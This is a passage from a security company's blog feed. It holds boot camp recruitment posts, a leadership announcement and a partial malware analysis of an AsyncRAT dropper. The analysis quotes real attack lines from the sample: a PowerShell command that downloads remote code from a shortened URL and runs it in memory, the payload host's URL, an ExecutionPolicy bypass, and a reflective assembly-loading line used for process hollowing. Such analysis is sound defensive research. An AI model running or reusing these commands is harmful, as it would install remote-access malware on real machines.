</span>it<span style="letter-spacing: -0.3pt;"> </span>was<span style="letter-spacing: -0.35pt;"> </span>a<span style="letter-spacing: -0.3pt;"> </span>journey<span style="letter-spacing: -0.3pt;"> </span>of<span style="letter-spacing: -0.4pt;"> </span>transformation.<span style="letter-spacing: -0.3pt;"> </span>It honed my skills, expanded my knowledge,
and prepared me for the challenges of the cybersecurity field. I am immensely<span style="letter-spacing: -0.55pt;"> </span>grateful<span style="letter-spacing: -0.55pt;">
</span>for<span style="letter-spacing: -0.5pt;"> </span>the<span style="letter-spacing: -0.5pt;"> </span>mentorship,<span style="letter-spacing: -0.5pt;"> </span>hands-on<span style="letter-spacing: -0.55pt;"> </span>experience,<span style="letter-spacing: -0.5pt;"> </span>and<span style="letter-spacing: -0.5pt;"> </span>the<span style="letter-spacing: -0.5pt;"> </span>certifications<span style="letter-spacing: -0.6pt;"> </span>that<span style="letter-spacing: -0.35pt;"> </span>have<span style="letter-spacing: -0.55pt;"> </span>propelled<span style="letter-spacing: -0.5pt;"> </span><span style="letter-spacing: -0.25pt;">me </span>forward.<span style="letter-spacing: -0.2pt;"> </span>This<span style="letter-spacing: -0.3pt;"> </span>journey<span style="letter-spacing: -0.2pt;">
</span>is<span style="letter-spacing: -0.3pt;"> </span>just<span style="letter-spacing: -0.2pt;"> </span>the<span style="letter-spacing: -0.25pt;"> </span>beginning,<span style="letter-spacing: -0.2pt;"> </span>and<span style="letter-spacing: -0.2pt;"> </span>I<span style="letter-spacing: -0.2pt;"> </span>look<span style="letter-spacing: -0.2pt;"> </span>forward<span style="letter-spacing: -0.2pt;"> </span>to<span style="letter-spacing: -0.2pt;"> </span>the<span style="letter-spacing: -0.25pt;"> </span>exciting<span style="letter-spacing: -0.25pt;">
</span>opportunities<span style="letter-spacing: -0.3pt;"> </span>and<span style="letter-spacing: -0.2pt;"> </span>challenges<span style="letter-spacing: -0.3pt;"> </span>that<span style="letter-spacing: -0.2pt;"> </span>lie ahead in the
ever-evolving world of cybersecurity.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">- Blog Post by Sifundo Ngubane</div>Timhttp://www.blogger.com/profile/06308817947660589574noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-73687686310044075932023-08-02T11:27:00.000+02:002023-08-02T11:27:47.324+02:00Boot Camp: 2023<p>We kicked off our 2023 Boot Camp programme with a fresh intake of interns in July 2023. After approximately 50 grueling interviews, 6 candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;">They are already knee-deep in the Boot Camp, having already completed several modules of the boot camp within their first month!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzx8XvllzzDPQqn7_-vWGJ6AZR3vfPuZHbCUWpM4U4M0ZzKoEnbtxB4KC-euVygRKCOEnHPONNQv-Upp01yJAKGs2cjkxTURGS8ISAxQEJ0uCzTyoy6O6JygEhv6SN2ZsEXgYiYi5T4--R-qN29Ex-WzkvFkQZBM0wGyHGIbhtXYA9bz3deNAOX7C6A2ag/s4032/IMG_3136.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3024" data-original-width="4032" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzx8XvllzzDPQqn7_-vWGJ6AZR3vfPuZHbCUWpM4U4M0ZzKoEnbtxB4KC-euVygRKCOEnHPONNQv-Upp01yJAKGs2cjkxTURGS8ISAxQEJ0uCzTyoy6O6JygEhv6SN2ZsEXgYiYi5T4--R-qN29Ex-WzkvFkQZBM0wGyHGIbhtXYA9bz3deNAOX7C6A2ag/w493-h370/IMG_3136.jpg" width="493" /></a></div><br /><br /></div><p class="MsoNormal" style="margin-bottom: 0cm;">We asked them for some feedback on their experience so far:<o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"The Telspace internship offers a dynamic and healthy work environment . It involves research, problem-solving, and exposure to top security experts, providing an incredible learning experience and motivation to be part of the team" - Sifundo</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"My experience in the bootcamp thus far has been challenging but very insightful. I've learned a lot in a very short time thanks to a welcoming, understanding and highly knowledgeable team." - Nathan </i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"I am in the hacker's realm. What more can I ask for? The learning experience has been great. The organisational culture is fantastic, and I plan to make the most of this golden opportunity." - Jacky</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"The bootcamp has been challenging, but I am learning a lot about penetration testing." - Muhammad</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"Through steep learning curves, we thrived; together yet independent. Laughter fortified us, and as one, we safeguard both each other and a better tomorrow" - Shane</i></p><p class="MsoNormal" style="margin-bottom: 0cm;">For those interested in entering the industry, we regularly host boot camps. If you would like to participate in our next boot camp, please get in touch with us at <a href="mailto:recruitment@telspace.africa">recruitment@telspace.africa</a></p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;">In order to prepare yourself, the interview process covers some of the following topics: Networking, Linux, Windows, Cryptography, general information security knowledge, as well as Software Development and Exploitation. We are certain that our Boot Camp surpasses the industry “standard” thanks to the following:</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"></p><ul><li><span style="text-indent: -18pt;">Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.</span></li><li><span style="text-indent: -18pt;">If interns are uncertain that they are a good fit for the industry or at Telspace Africa during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).</span></li><li><span style="text-indent: -18pt;">Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways, then they will be offered a 4-month contract as a junior analyst with Telspace Africa (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.</span></li><li>This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.</li></ul><p class="MsoListParagraph" style="margin-bottom: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -18pt;"><o:p></o:p></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><b>Telspace wishes each new intern the very best of luck; we are eager to see the wonderful knowledge you will gain, as well as the many shells you will be popping!</b></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p>Timhttp://www.blogger.com/profile/06308817947660589574noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-82798349477962708842022-07-07T09:33:00.003+02:002022-07-12T09:20:25.564+02:00Boot Camp: 2022<p>We kicked off our 2022 Boot Camp programme with a fresh intake of interns in May 2022. After approximately 60
gruelling interviews, 3 candidates were selected and invited to attend the Boot
Camp. Congratulations to all that made it!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p>
<p class="MsoNormal" style="margin-bottom: 0cm;">They are already knee-deep in the Boot
Camp, having completed several modules of the boot camp already!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP5O3oQzZ4G05-9_JsMla5S1l7fWLvR7v4K5ZwoW09a8oYCnwdfAF8zbEQilcbLYSHSG4u3NsQy2upM1BFjHpivw-AvmqL-HrLlG2rnstzMcIoaJs4XiDykwNzlKaW4HW72NQjeVctkNi6dLKtPuvG4zSWxAVCpejh1AJbKWK6CkgY5-c-kzdpOyuwZQ/s1380/Photo.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1035" data-original-width="1380" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP5O3oQzZ4G05-9_JsMla5S1l7fWLvR7v4K5ZwoW09a8oYCnwdfAF8zbEQilcbLYSHSG4u3NsQy2upM1BFjHpivw-AvmqL-HrLlG2rnstzMcIoaJs4XiDykwNzlKaW4HW72NQjeVctkNi6dLKtPuvG4zSWxAVCpejh1AJbKWK6CkgY5-c-kzdpOyuwZQ/w422-h316/Photo.jpg" width="422" /></a></div><br /><p class="MsoNormal" style="margin-bottom: 0cm;">We asked them for some feedback on
their experience so far:<o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>“The Telspace internship for me
is fast paced, healthy work environment as an intern and needs you to always be
on your toes. Whether you make mistakes or get it right first try, you keep pushing
further” – Obakeng</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>“It involves tons of research
and problem-solving. One moment, I am on top of the world as I would pwn the
machines and the next, I am back to my sorrows. I still love it though” –
Tswaitswai</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>“It has been an unbelievable
experience so far. I have not only had the opportunity to expand my knowledge
so vastly in such a short time but I have been afforded the opportunity to get
to know and see first-hand what some of the country’s top security experts can
do, which only adds to the excitement and motivation to become a part of this
great team” - Jason</i></p><p class="MsoNormal" style="margin-bottom: 0cm;">For those interested in entering
the industry, we will be hosting another boot camp later this year. If you
would like to participate, please get in touch with us at <a href="mailto:recruitment@telspace.africa">recruitment@telspace.africa</a></p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;">In order to prepare yourself, the
interview process covers some of the following topics: Networking, Linux,
Windows, Cryptography, general information security knowledge, as well as
Software Development and Exploitation. We are certain that our Boot Camp
surpasses the industry “standard” thanks to the following:</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"></p><ul style="text-align: left;"><li><span style="text-indent: -18pt;">Our interns don’t have any monetary restraint
attached to them, as they are paid a monthly salary whilst undertaking the
training with us. Additionally, there are no restraints where the interns will
have to pay back money if they do not end up working for Telspace at the end of
the Boot Camp. Having an approach other than this would not benefit our
newcomers to the industry, nor the community at large.</span></li><li><span style="text-indent: -18pt;">If interns are uncertain that they are a good
fit for the industry or at Telspace Africa during the boot camp, then they are
free to leave at any time, taking what they have learnt with them, including
any certifications (and we are more than happy with that!).</span></li><li><span style="text-indent: -18pt;">Should our interns pass the strict criteria at
the end of the boot camp, via different assessment gateways, then they will be
offered a 4-month contract as a junior analyst with Telspace Africa (which they
are not obliged to accept). If they do accept the offer, then further
certifications and training will be provided by Telspace.</span></li><li>This boot camp is about growing the information
security community, and thereafter, our company; in order to provide our
customers with the best possible service.</li></ul><p class="MsoListParagraph" style="margin-bottom: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -18pt;"><o:p></o:p></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><b>Telspace wishes each new intern the very best of
luck; we are eager to see the wonderful knowledge you will gain, as well as the
many shells you will be popping!</b></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p>Timhttp://www.blogger.com/profile/06308817947660589574noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-71266154350657242252022-05-10T13:48:00.002+02:002022-05-11T09:17:25.216+02:00A new era for Telspace<p><span style="font-size: medium;">As Telspace celebrates its 20th anniversary of being in business, I consider myself lucky to have been the Founder and CEO of such an incredible company. </span></p><p><span style="font-size: medium;">Being CEO and Founder, it’s always been a key goal of mine to give back to the community at large and more specifically the South African community. It’s not as easy to do so when you’re starting a business alone especially at 19 years old, with no experience (and no capital at all!), but we’ve always tried to do our part over the years. It’s been a pleasure to watch the South African community grow in the last 2 decades, seeing the difference between 2002 and 2022 is staggering for me. </span></p><p><span style="font-size: medium;">Throughout all the ups and downs of running a business over the last 2 decades, giving back to the community by growing it within South Africa has brought me the most joy. Watching people that started their careers with us knowing very little to now having exceptional jobs at large (or small) corporate firms, gives me a lot of happiness. The same goes for our internship programs and other free community initiatives we have run with for information security education over the years. </span></p><p style="text-align: left;"><span style="font-size: medium; font-weight: normal;">With the above being said, it is also why we, as management, have decided to change the business and rebrand to Telspace Africa. Our rebranding and new leadership changes are in line with our new strategy to set the foundation for the next 20 years of Telspace Africa with a stronger and clearer focus on the African market.</span></p><p><span style="font-size: medium;">It therefore gives me great pride to announce that Dr Manuel Corregedor will now be the Chief Executive Officer of Telspace Africa. Anyone that has met and knows Manuel well, will attest to what an incredible person he is. Particularly, a person of high integrity and character. In addition, he’s been a great friend to me, a mentor to countless students and staff, a phenomenal colleague, and his contributions to the information security sector in SA (and abroad) have been significant and are largely unmatched (except for a select few others in our country). I’m proud to not only know Manuel as a best friend, but also now have him as our CEO. Congratulations Manuel, you truly deserve it.</span></p><p><span style="font-size: medium;">In line with our management change, Timothy Quintal has been promoted to Chief Operating Officer. Timothy (like Manuel) is an exceptionally strong leader, a strategic and critical thinker and has a strong focus on developing others. Timothy exudes positivity and has a strong focus on growing each individual at our company. Also, someone I’m proud to call a great friend.</span></p><p><span style="font-size: medium;">We’ve also had other internal staff promotions in management positions internally, all with the best intentions for our staff and customers.</span></p><p><span style="font-size: medium;">Lastly, my new role at Telspace Africa as Chairman, is overlooking and steering the company in the right direction and to serve on our board in the best possible way, encouraging growth not only for our company but again, in our community.</span></p><p><span style="font-size: medium;">Thank you to all our customers and staff that have believed in us over the years, we look forward to serving you for the next 20 years and beyond.</span></p><p><span style="font-size: medium;">-Dino Covotsos</span></p><div><br /></div>break2fixhttp://www.blogger.com/profile/06040620743029387401noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-34838591154444701592021-07-15T13:55:00.096+02:002021-07-15T14:46:17.319+02:00Reverse Engineering AsyncRat Payload<p>As part of some current research that I am doing, I decided to analyse malicious samples in VBS and PS1 formats to understand what techniques APTs and malicious actors are using for obfuscation. This led me to discovering AsyncRAT which I reverse engineered and wanted to share my experiences / findings with the community. </p><p>AsyncRAT is the name of a remote access or administration tool which is used to control computers remotely. However, Chinese APT groups have been observed to be using this to perform various actions such as stealing personal information or sensitive details.</p><p>The sample that I used can be found at this link (uploaded on the 12th of July 2021): https://bazaar.abuse.ch/sample/ea477346ddead4bd4cb67cf81ca9e22f9bc6ebd57b24540e44abdecb7a3e539e/</p><p>This is a payload found in the wild that uses multiple obfuscation and file manipulation techniques as an end goal to download AsyncRAT for remote control. </p><p>The sample being analysed contains a VBS payload, the hashes can be seen in screenshot 1.1 below:</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiLRsPgKV__TlQJpUHJxiHCDdjANghBN0CS39rjj6QPlkiIL71u_327ZfOyIEjYCoNZw4H-1To_x4Sk-Y62o6de7uNshwsjcy7X0UsSo24hX3vOk7euOcdYM_SBJuhGYHCahqSSmIk2XGk/s604/Picture+1.png" style="margin-left: auto; margin-right: auto;"><img alt="1.1" border="0" data-original-height="212" data-original-width="604" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiLRsPgKV__TlQJpUHJxiHCDdjANghBN0CS39rjj6QPlkiIL71u_327ZfOyIEjYCoNZw4H-1To_x4Sk-Y62o6de7uNshwsjcy7X0UsSo24hX3vOk7euOcdYM_SBJuhGYHCahqSSmIk2XGk/w640-h224/Picture+1.png" title="1.1" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.1</td></tr></tbody></table><br /><p>The contents of file.vbs contain PowerShell commands that have been obfuscated through techniques such as replacing and splitting strings in addition to downloading files as shown in screenshot 1.2.</p><p> </p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF70979V-TBelsglxVMsHFfeIMxs6UryTD4M80-ciHwQeYqUE9AwJ_D5mIcB5MlpYz08xM3c3hI59TuspF8jqCYFhG4VxLN9sDb9ysnoJ_s7UdNh7B-XEpQ6E6y4ktVwHsJE8CJJYRrmfp/s1430/Picture+2.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="119" data-original-width="1430" height="53" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF70979V-TBelsglxVMsHFfeIMxs6UryTD4M80-ciHwQeYqUE9AwJ_D5mIcB5MlpYz08xM3c3hI59TuspF8jqCYFhG4VxLN9sDb9ysnoJ_s7UdNh7B-XEpQ6E6y4ktVwHsJE8CJJYRrmfp/w640-h53/Picture+2.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.2</td></tr></tbody></table><br />The VBS payload executes through Wscript the command “powershell -Command (New-Object Net.WebClient.DownloadString(''https://bit.ly/3wylsze'')| IEX” , which will download the contents of the specified URL https://bit.ly/3wylsze and execute them in memory.<p></p><p>By browsing to this URL, you get redirected to https://biplabbiprodas.com/wp-content/themes/jackryan/languages/LzWZ0w70pWJ95p9s.jpg which is supposed to be a JPG image but it is not loading as shown in screenshot 1.3.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Y1hg0L0T9b0Tg4PYp9rvM7y9EIkA7eNCWKPt1NAFOxvmmomSeHhn5Vye8AGeMFa8Dd6uzHx-ZNGo6EwGUertqyNqGbE6ShUAYkxdfRhhpx6LRQD2pDUWge7Do8JKTNZKjbS80XqVY0PA/s1430/Picture+3.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="165" data-original-width="1430" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Y1hg0L0T9b0Tg4PYp9rvM7y9EIkA7eNCWKPt1NAFOxvmmomSeHhn5Vye8AGeMFa8Dd6uzHx-ZNGo6EwGUertqyNqGbE6ShUAYkxdfRhhpx6LRQD2pDUWge7Do8JKTNZKjbS80XqVY0PA/w640-h74/Picture+3.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.3</td></tr></tbody></table><br /><p>By downloading and inspecting the “picture” we realise it is PowerShell code (shown in 1.4).</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVjl6ptbZRx4cid5mcYSrPoZA5PLx_mG1XsOwKoXmsTVgsunsYMS2xkeKx9enA0dQ40YwPvZI12wd0Z62jmq4AtnVUTTvKGCwlwqLzIC1srqLPB0QspjE1rDMI_G4T8sgd_IPqY0IbEWmv/s624/Picture+4.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="220" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVjl6ptbZRx4cid5mcYSrPoZA5PLx_mG1XsOwKoXmsTVgsunsYMS2xkeKx9enA0dQ40YwPvZI12wd0Z62jmq4AtnVUTTvKGCwlwqLzIC1srqLPB0QspjE1rDMI_G4T8sgd_IPqY0IbEWmv/s16000/Picture+4.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.4</td></tr></tbody></table><br /><p>The PowerShell that is executed in memory downloads multiple files, replaces and concatenates strings together and performs execution in memory.</p><p>In the beginning of the script a number of directories are created recursively in this location C:\ProgramData\Microsoft Arts\Start , as shown in the first highlight of screenshot 1.5.</p><p>Further in the script 3 actions are performed where it sets 3 locations</p><p></p><ul style="text-align: left;"><li>C:\ProgramData\Microsoft Arts\Start\</li><li>C:\Users\Public\</li><li>C:\Users\Public\</li></ul><p></p><p>Obfuscated by replacing random strings between those location paths in the second highlight of 1.5.</p><p>Next the script downloads 3 files respectively in the above-mentioned path locations as a .lnk , .bat and .ps1 and executes the .lnk file.</p><p><br /></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiMMWw1w5xQr7aX644LGUkmxQmvU6OjbLt7dj_286kcClJ8U5_h_nK3c7Z8VZHUavmV72RMxFjB46inavWFe32RD6HcXVY2QwTZp-3KwdbX_nrCF8gtC6DuLp-eCfBv1qYofEze6-QkOS0/s1430/Picture+5.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="440" data-original-width="1430" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiMMWw1w5xQr7aX644LGUkmxQmvU6OjbLt7dj_286kcClJ8U5_h_nK3c7Z8VZHUavmV72RMxFjB46inavWFe32RD6HcXVY2QwTZp-3KwdbX_nrCF8gtC6DuLp-eCfBv1qYofEze6-QkOS0/w640-h197/Picture+5.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.5</td></tr></tbody></table><br /><p>The .lnk file is a shortcut that will execute the .bat file from the second location in 1.6.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKlT_s_CF-Aph0LLVOsKR64pZH4djNIVxtebi7LK2-GIW6he8kwP9A_vnSe7zjfdBbv5T83v3oA8S_bRAUhD6ha6XzETpZ5_4KgysjaALU9LBA72KZoPed-NWP2S2bL1jTlH6H1qm4wDVS/s1445/1.6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="69" data-original-width="1445" height="31" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKlT_s_CF-Aph0LLVOsKR64pZH4djNIVxtebi7LK2-GIW6he8kwP9A_vnSe7zjfdBbv5T83v3oA8S_bRAUhD6ha6XzETpZ5_4KgysjaALU9LBA72KZoPed-NWP2S2bL1jTlH6H1qm4wDVS/w640-h31/1.6.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.6</td></tr></tbody></table><br /><p>The .bat file executes mshta command with parameters in the command line as vbscript:Execute, to execute through Wscript a PowerShell command in screenshot 1.7.</p><p><br /></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ7Fe5fXYet3RdLIFAgirQExcnJPtXbjeKtd3eqCnkoeJzvxI3WTIv9o7A_ljk1-G8eGVExmFqdebdaFFOSpD0FPFMvJpGWCpYK_wOaIasEOXv1z7XWnzrwauevfQeUAVJyigxEhXFoOx/s1430/Picture+7.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="51" data-original-width="1430" height="23" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ7Fe5fXYet3RdLIFAgirQExcnJPtXbjeKtd3eqCnkoeJzvxI3WTIv9o7A_ljk1-G8eGVExmFqdebdaFFOSpD0FPFMvJpGWCpYK_wOaIasEOXv1z7XWnzrwauevfQeUAVJyigxEhXFoOx/w640-h23/Picture+7.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.7</td></tr></tbody></table><br /><p>The PowerShell command de-obfuscated executes the powershell .ps1 file downloaded earlier with the command line parameter of bypassing the ExecutionPolicy for scripts.</p><p>powershell -ExecutionPolicyBypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1</p><p>The .ps1 script contains a short sleep command, 2 sets of shellcode and execution through assembly in the highlights of screenshot 1.8.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyNmXhtxgxQYiY7gYK_mQTLEzmqX7ohdO5MvCLhfRe5x_-mPUoCRbVNXSS_oztoJKdAlP3BRklpqPiYa3fHD_nvhAVHUKmy5LdsdM7SZOZuoIajQxLPmVjNZfSul6joRiZJ-ICsRZi8Xm7/s1430/Picture+8.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="394" data-original-width="1430" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyNmXhtxgxQYiY7gYK_mQTLEzmqX7ohdO5MvCLhfRe5x_-mPUoCRbVNXSS_oztoJKdAlP3BRklpqPiYa3fHD_nvhAVHUKmy5LdsdM7SZOZuoIajQxLPmVjNZfSul6joRiZJ-ICsRZi8Xm7/w640-h176/Picture+8.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.8</td></tr></tbody></table><p>Each shellcode is obfuscated with a certain pattern that gets replaced with 0, by using find & replace, we get the original shellcodes. The shellcodes are strings, hence the function where they are called to be converted as bytes.</p><p>After they are converted as bytes, they are saved in Byte variables to be used further in the script.</p><p>Peculiar note here, it seems like the variable H5 is defined twice with the exact same payload, which is weird since it changes nothing (see 1.9).</p><p>In addition to all of the above, there is the execution of assembly in the last line by using the shellcodes and the variable called ali which sets as a string the aspnet_compiler.exe from the .NET framework.</p><p>Let’s try to obtain the binaries from those shellcodes, by saving them to a file after they are converted to bytes and remove the last line to avoid becoming a victim.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBJamkD3NtsY6OLe3hnW3m6Sc5vv0Kk7s6HYBrDU-Z5DqUoTbYbY98pYYLa1a2PIFdxyU4tELEXldKNbd__2wwneKHtALI2bF780yqpX9yzrVak-W8riXeVMM71dCCpdnr8DGGw1i2rfmH/s520/Picture+9.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="104" data-original-width="520" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBJamkD3NtsY6OLe3hnW3m6Sc5vv0Kk7s6HYBrDU-Z5DqUoTbYbY98pYYLa1a2PIFdxyU4tELEXldKNbd__2wwneKHtALI2bF780yqpX9yzrVak-W8riXeVMM71dCCpdnr8DGGw1i2rfmH/w640-h128/Picture+9.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.9</td></tr></tbody></table><br /><p>By obtaining the files, we perform some initial analysis on them:</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSe55Y5P0EgyIazrjzyF2JmpmER14rZaj0qS8FMyI8lkSQZBUTp3Eft0jYyP0qOh1dx0LsmPZXYa1731XCVdxWcySC0iSkuDq6VhD9TU0hKG9GHJPHGdXkDCboSLJ5R3Rpqc70eWozsMvz/s624/Picture+10.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="244" data-original-width="624" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSe55Y5P0EgyIazrjzyF2JmpmER14rZaj0qS8FMyI8lkSQZBUTp3Eft0jYyP0qOh1dx0LsmPZXYa1731XCVdxWcySC0iSkuDq6VhD9TU0hKG9GHJPHGdXkDCboSLJ5R3Rpqc70eWozsMvz/w640-h250/Picture+10.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.10</td></tr></tbody></table><br /><p>We will return back to the .ps1 script soon since the last line executes those 2 binaries, but we need to realise what is happening, H5 is the one that gets loaded for assembly execution.</p><p>By loading the H5 payload in ILSpy we are presented with the below:</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRDyN9_Aqd9C7tohUdObo52dV-Fbb7CIaJi7lKh7qgssOxRPKBDdsYq1KBKa0yz_7w2gOj4xddxpZ4DQ_YjfDz4lq8PePNDrCtyYtt4ibMBigmy-i1eDYi-u1Lw59cQE-wHelJoIxesT0/s1451/1.11.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="927" data-original-width="1451" height="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRDyN9_Aqd9C7tohUdObo52dV-Fbb7CIaJi7lKh7qgssOxRPKBDdsYq1KBKa0yz_7w2gOj4xddxpZ4DQ_YjfDz4lq8PePNDrCtyYtt4ibMBigmy-i1eDYi-u1Lw59cQE-wHelJoIxesT0/w640-h409/1.11.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.11</td></tr></tbody></table><p><br /></p><p>Instantly from the set of WINAPI calls being executed in screenshot 1.11, we realise that this is Process Hollowing injection, which makes perfect sense since the last line uses the aspnet_compiler.exe to execute this attack and instead executes the H6 binary, which is the actual malware.</p><p>The last command is:</p><p>[Reflection.Assembly]::Load($H5).GetType('VNPT.B').GetMethod('NET').Invoke($null,[object[]] ($ali,$H6)) </p><p>The H5 binary is loaded in memory and executes the function NET of VPNT.B with parameters aspnet_compiler.exe and the H6 binary as shown in 